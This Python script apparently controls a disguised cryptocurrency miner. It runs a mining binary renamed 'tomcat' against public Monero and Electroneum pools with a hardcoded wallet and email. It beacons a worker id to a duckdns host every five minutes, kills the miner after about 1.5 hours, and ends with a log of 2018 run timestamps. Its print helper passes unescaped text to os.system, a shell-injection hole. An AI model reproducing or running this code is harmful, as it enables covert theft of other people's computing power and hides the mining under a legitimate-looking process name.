import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:01.462658
#2018-02-17 16:56:04.047302
#2018-02-17 18:43:04.038599
#2018-02-17 20:31:07.077263
#2018-02-17 22:17:03.624015
#2018-02-18 00:01:04.077630
#2018-02-18 01:51:05.980666
#2018-02-18 03:39:05.170414
#2018-02-18 05:26:01.762862
#2018-02-18 07:18:04.888301
#2018-02-18 09:06:03.776116
#2018-02-18 10:52:01.739707
#2018-02-18 12:38:07.248555
#2018-02-18 14:24:05.952531
#2018-02-18 16:15:06.856290
#2018-02-18 18:03:06.829137
#2018-02-18 19:50:08.795273
#2018-02-18 21:37:05.880229
#2018-02-18 23:25:05.073606
#2018-02-19 01:12:05.115247
#2018-02-19 02:58:01.244756
#2018-02-19 04:45:07.593098
#2018-02-19 06:31:01.705959
#2018-02-19 08:20:08.100152
#2018-02-19 10:09:01.563723
#2018-02-19 11:58:01.328152
#2018-02-19 13:45:09.395949
#2018-02-19 15:33:06.896758
#2018-02-19 17:19:04.604214
#2018-02-19 19:06:05.554619
#2018-02-19 20:52:03.610758
#2018-02-19 22:39:05.504503
#2018-02-20 00:24:07.010828
#2018-02-20 02:13:06.474725
#2018-02-20 04:03:04.304250
#2018-02-20 05:46:05.401173
#2018-02-20 07:32:05.474942
#2018-02-20 09:17:01.762209
#2018-02-20 11:01:03.995138
#2018-02-20 12:48:06.283796
#2018-02-20 14:34:06.573736
#2018-02-20 16:19:07.850215
#2018-02-20 18:06:08.251974
#2018-02-20 19:58:06.284525
#2018-02-20 21:45:09.106277
#2018-02-20 23:27:04.872472
#2018-02-21 01:11:01.419598
#2018-02-21 02:57:02.084999
#2018-02-21 04:45:09.131078
#2018-02-21 06:35:05.465528
#2018-02-21 08:21:01.742505
#2018-02-21 10:06:06.828092
#2018-02-21 11:53:10.264803
#2018-02-21 13:43:07.148920
#2018-02-21 15:28:01.288520
#2018-02-21 17:18:02.172290
#2018-02-21 19:05:07.523582
#2018-02-21 20:54:07.414715
#2018-02-21 22:42:07.168651
#2018-02-22 00:31:01.398794
#2018-02-22 02:18:07.228608
#2018-02-22 04:04:02.158771
#2018-02-22 05:50:04.202695
#2018-02-22 07:35:08.784598
#2018-02-22 09:23:05.734682
#2018-02-22 11:09:01.821131
#2018-02-22 12:55:04.302594
#2018-02-22 14:42:04.436187
#2018-02-22 16:26:08.993617
#2018-02-22 18:14:01.754862
#2018-02-22 20:03:01.335853
#2018-02-22 21:51:05.526197
#2018-02-22 23:40:07.551346
#2018-02-23 01:28:07.964747
#2018-02-23 03:16:03.677509
#2018-02-23 05:02:07.021817
#2018-02-23 06:47:06.845034
#2018-02-23 08:40:07.634468
#2018-02-23 10:56:06.811083
#2018-02-23 12:53:05.512218
#2018-02-23 14:38:07.768027
#2018-02-23 16:28:08.682269
#2018-02-23 18:14:07.106593
#2018-02-23 19:58:01.549125
#2018-02-23 21:41:06.909703
#2018-02-23 23:35:06.146759
#2018-02-24 01:24:02.023078
#2018-02-24 03:14:07.815548
#2018-02-24 04:59:06.161487
#2018-02-24 06:47:01.995375
#2018-02-24 08:36:01.755192
#2018-02-24 10:21:05.403216
#2018-02-24 12:16:07.253695
#2018-02-24 14:08:01.324425
#2018-02-24 15:54:06.417930
#2018-02-24 17:45:08.422401
#2018-02-24 19:31:04.871966
#2018-02-24 21:20:03.668529
#2018-02-25 01:22:04.413649
#2018-02-25 05:30:08.514458
#2018-02-25 11:35:08.385766